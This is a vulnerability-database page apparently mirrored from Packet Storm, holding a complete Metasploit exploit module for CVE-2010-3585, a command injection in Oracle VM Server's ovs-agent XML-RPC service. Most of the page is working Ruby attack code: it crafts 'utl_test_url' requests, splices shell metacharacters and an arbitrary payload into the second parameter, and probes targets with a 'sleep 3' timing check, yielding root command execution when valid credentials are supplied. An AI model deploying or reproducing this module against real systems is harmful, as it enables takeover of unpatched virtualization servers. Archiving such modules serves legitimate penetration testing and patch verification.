Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormJduckPACKETSTORM:95120
HistoryOct 25, 2010 - 12:00 a.m.

Oracle VM Server Virtual Server Agent Command Injection

2010-10-2500:00:00
jduck
packetstormsecurity.com
23

0.971 High

EPSS

Percentile

99.8%

JSON
`##  
# $Id: oracle_vm_agent_utl.rb 10821 2010-10-25 20:58:49Z jduck $  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to  
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
require 'msf/core'  
  
class Metasploit3 < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::HttpClient  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'Oracle VM Server Virtual Server Agent Command Injection',  
'Description' => %q{  
This module exploits a command injection flaw within Oracle\'s VM Server  
Virtual Server Agent (ovs-agent) service.  
  
By including shell meta characters within the second parameter to the 'utl_test_url'  
XML-RPC methodCall, an attacker can execute arbitrary commands. The service  
typically runs with root privileges.  
  
NOTE: Valid credentials are required to trigger this vulnerable. The username  
appears to be hardcoded as 'oracle', but the password is set by the administrator  
at installation time.  
},  
'Author' => [ 'jduck' ],  
'License' => MSF_LICENSE,  
'Version' => '$Revision: 10821 $',  
'References' =>  
[  
# ovs-agent.spec:- Fix ovs agent command injection [orabug 10146644] {CVE-2010-3585}  
['CVE', '2010-3585'],  
['OSVDB', '68797'],  
['BID', '44047']  
],  
'Privileged' => true,  
'Platform' => ['unix', 'linux'],  
'Arch' => ARCH_CMD,  
'Payload' =>  
{  
'Space' => 512,  
'BadChars' => '<>',  
'DisableNops' => true,  
'Keys' => ['cmd', 'cmd_bash'],  
},  
'Targets' => [ ['Automatic', { }], ],  
'DefaultTarget' => 0,  
'DisclosureDate' => 'Oct 12 2010'  
))  
  
register_options(  
[  
Opt::RPORT(8899),  
OptBool.new('SSL', [ true, 'Use SSL', true ]),  
OptString.new('CMD', [ false, "A single command to execute instead of the payload" ]),  
OptString.new('USERNAME', [ true, "The user to authenticate as", 'oracle']),  
OptString.new('PASSWORD', [ true, "The password to authenticate with" ])  
], self.class)  
  
deregister_options(  
'HTTP::junk_params', # not your typical POST, so don't inject params.  
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.  
)  
end  
  
def go(command)  
datastore['BasicAuthUser'] = datastore['USERNAME']  
datastore['BasicAuthPass'] = datastore['PASSWORD']  
  
xml = <<-EOS  
<?xml version="1.0"?>  
<methodCall>  
<methodName>utl_test_url</methodName>  
<params><param>  
<value><string>PARAM1</string></value>  
</param></params>  
<params><param>  
<value><string>PARAM2</string></value>  
</param></params>  
<params><param>  
<value><string>PARAM3</string></value>  
</param></params>  
<params><param>  
<value><string>PARAM4</string></value>  
</param></params>  
</methodCall>  
EOS  
  
sploit = rand_text_alphanumeric(rand(128)+32)  
sploit << "';" + command + ";'"  
  
xml.gsub!(/PARAM1/, 'http://' + rand_text_alphanumeric(rand(128)+32) + '/')  
xml.gsub!(/PARAM2/, sploit)  
xml.gsub!(/PARAM3/, rand_text_alphanumeric(rand(128)+32))  
xml.gsub!(/PARAM4/, rand_text_alphanumeric(rand(128)+32))  
  
res = send_request_cgi(  
{  
'uri' => '/RPC2',  
'method' => 'POST',  
'ctype' => 'application/xml',  
'data' => xml,  
}, 5)  
  
if not res  
if not session_created?  
print_error('Unable to complete XML-RPC request')   
return nil  
end  
  
# no response, but session created!!!  
return true  
end  
  
case res.code  
when 403  
print_error('Authentication failed!')  
return nil  
  
when 200  
print_good('Our request was accepted!')  
return res  
  
end  
  
print_error("Encountered unexpected #{res.code} reponse:")  
print_error(res.inspect)  
  
return nil  
end  
  
def check  
print_status("Attempting to detect if the server is vulnerable...")  
  
# Try running/timing sleep 3  
start = Time.now  
go('sleep 3')  
elapsed = Time.now - start  
if elapsed >= 3 and elapsed <= 4  
return Exploit::CheckCode::Vulnerable  
end  
  
return Exploit::CheckCode::Safe  
end  
  
def exploit  
print_status("Attempting to execute the payload...")  
  
cmd = datastore['CMD']  
cmd ||= payload.encoded  
  
if not go(cmd)  
raise RuntimeError, "Unable to execute the desired command"  
end  
  
handler  
end  
  
end  
`

Related

cvelist 1
cve 1
securityvulns 3
metasploit 1
prion 1
nvd 1
seebug 1
exploitdb 1
nessus 1
oracle 1
cvelist
cvelist
CVE-2010-3585
2010-10-14 17:00:00
cve
cve
CVE-2010-3585
2010-10-14 18:00:19
securityvulns
securityvulns
[Onapsis Security Advisory 2010-008] Oracle Virtual Server Agent Arbitrary File Access
2010-11-04 00:00:00
Oracle / Sun / Peoplesoft applications multiple security vulnerabilities
2011-07-18 00:00:00
Oracle Critical Patch Update Advisory - October 2010
2010-10-13 00:00:00
metasploit
metasploit
Oracle VM Server Virtual Server Agent Command Injection
2010-10-22 06:16:31
prion
prion
Design/Logic Flaw
2010-10-14 18:00:00
nvd
nvd
CVE-2010-3585
2010-10-14 18:00:19
seebug
seebug
Oracle VM Server Virtual Server Agent Command Injection
2014-07-01 00:00:00
exploitdb
exploitdb
Oracle VM Server Virtual Server Agent - Command Injection (Metasploit)
2010-10-25 00:00:00
nessus
nessus
OracleVM 2.2 : ovs-agent (OVMSA-2010-0015)
2013-07-15 00:00:00
oracle
oracle
Oracle Critical Patch Update - October 2010
2010-10-12 00:00:00

0.971 High

EPSS

Percentile

99.8%

JSON
Related for PACKETSTORM:95120
cvelist1cve1securityvulns3metasploit1prion1nvd1seebug1exploitdb1nessus1oracle1